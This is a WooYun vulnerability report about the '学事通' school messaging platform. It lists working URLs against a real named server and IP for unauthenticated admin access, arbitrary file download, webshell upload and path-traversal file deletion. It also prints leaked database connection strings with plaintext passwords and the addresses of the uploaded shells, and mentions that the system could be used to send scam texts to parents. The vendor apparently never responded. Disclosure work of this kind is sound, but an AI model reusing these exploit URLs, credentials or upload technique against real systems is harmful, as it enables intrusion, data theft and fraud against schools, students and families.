当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161231

漏洞标题:学事通任意文件上传下载删除

相关厂商:学事通

漏洞作者: thx

提交时间:2015-12-14 16:57

修复时间:2016-01-25 18:01

公开时间:2016-01-25 18:01

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

天干物燥 小心火烛

详细说明:

学事通
偶然看到的一个站,危害之一是可以利用该系统给学生家长群发诈骗短信
http://www.njxt.net:8000
60.190.202.51

未授权访问
http://www.njxt.net:8000/scmanage/index.aspx?sid=22&uname=0022029
http://www.njxt.net:8000/scmanage/index.aspx?sid=52&uname=0193001
http://www.njxt.net:8000/scmanage/index.aspx?sid=166&uname=0104060
爆破学校ID,403则存在
http://www.njxt.net:8000/image/studentimg/166/
爆破学校账号应该也行,7位数,这里没有试


任意文件下载
http://www.njxt.net:8000/ashx/download.ashx?/scManage/学事通校园管理员-最新版.pdf
http://www.njxt.net:8000/ashx/download.ashx?/web.config
<connectionStrings>
<add name="SqlConnection" connectionString="server=60.190.202.36,14333\SZ;database=newSZJXT;uid=SZJXTUSER;pwd=DG8FV-B9TKY-FRT9J" />
<add name="EngelishConnection" connectionString="server=60.190.202.20;database=SZLXYY;uid=sa;pwd=linkivr" />
<add name="SMSConnction" connectionString="server=60.190.202.53,14333\SZ;database=SMS;uid=SZJXTUSER;pwd=DG8FV-B9TKY-FRT9J" />
<add name="xstSmsConn" connectionString="server=60.190.202.38,49469;database=XST;uid=sa;pwd=qaz!@#0401"/>
</connectionStrings>


任意文件上传
http://www.njxt.net:8000/scmanage/index.aspx?sid=166&uname=0104060
学生管理,编辑,上传学生照片,直接传马,提交,再编辑,可得到马的完整地址
http://www.njxt.net:8000/flash/up.swf?url=/ashx/SaveFile.ashx&Img=/image/studentimg/166/df4fe0d2-f2b2-4e8b-9d58-724fd2ce8caf.aspx&call=FlashCall
http://www.njxt.net:8000/image/studentimg/166/df4fe0d2-f2b2-4e8b-9d58-724fd2ce8caf.aspx
以上为测试删除文件前上传的,新的地址是:
http://www.njxt.net:8000/image/studentimg/166/724e49b4-b103-47af-b07e-3ad66047f93a.aspx


http://www.njxt.net:8000/ashx/download.ashx?/ashx/SaveFile.ashx
SaveFile.ashx源码:
<%@ WebHandler Language="C#" Class="SaveFile" %>
using System;
using System.Web;
using System.IO;
public class SaveFile : IHttpHandler
{
public void ProcessRequest(HttpContext context)
{
context.Response.ContentType = "text/plain";
var delName = context.Request["delName"];
if (!string.IsNullOrEmpty(delName))
{
System.IO.File.Delete(context.Server.MapPath("/uploadtemp/" + delName));
context.Response.End();
}
int length = context.Request.InputStream.Length.toString(0);
if (length <= 0) return;
byte[] buffer = new byte[length];
context.Request.Files["Filedata"].InputStream.Read(buffer, 0, length);
string fileExt = Path.GetExtension(context.Request.Params[0].toString()).ToLower();
string name = Guid.NewGuid().toString() + fileExt;
string path = HttpContext.Current.Server.MapPath("~/uploadtemp/" + name);
System.IO.FileStream fs = new FileStream(path, FileMode.Create, FileAccess.Write);
System.IO.BinaryWriter bw = new BinaryWriter(fs);
bw.Write(buffer);
bw.Close();
fs.Close();
context.Response.Write(name);
}
public bool IsReusable
{
get
{
return false;
}
}
}


从源码发现,任意文件删除
http://www.njxt.net:8000/ashx/SaveFile.ashx?delName=../image/studentimg/166/df4fe0d2-f2b2-4e8b-9d58-724fd2ce8caf.aspx


漏洞证明:

从图片文件夹路径看,大概有800个学校,一个学校几百学生,总人数还是很可观的

2015-12-14_152003.jpg


最后连接数据库看看:

2015-12-14_153627.jpg


没有进一步看,SHELL请自行删除。

修复方案:

版权声明:转载请注明来源 thx@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝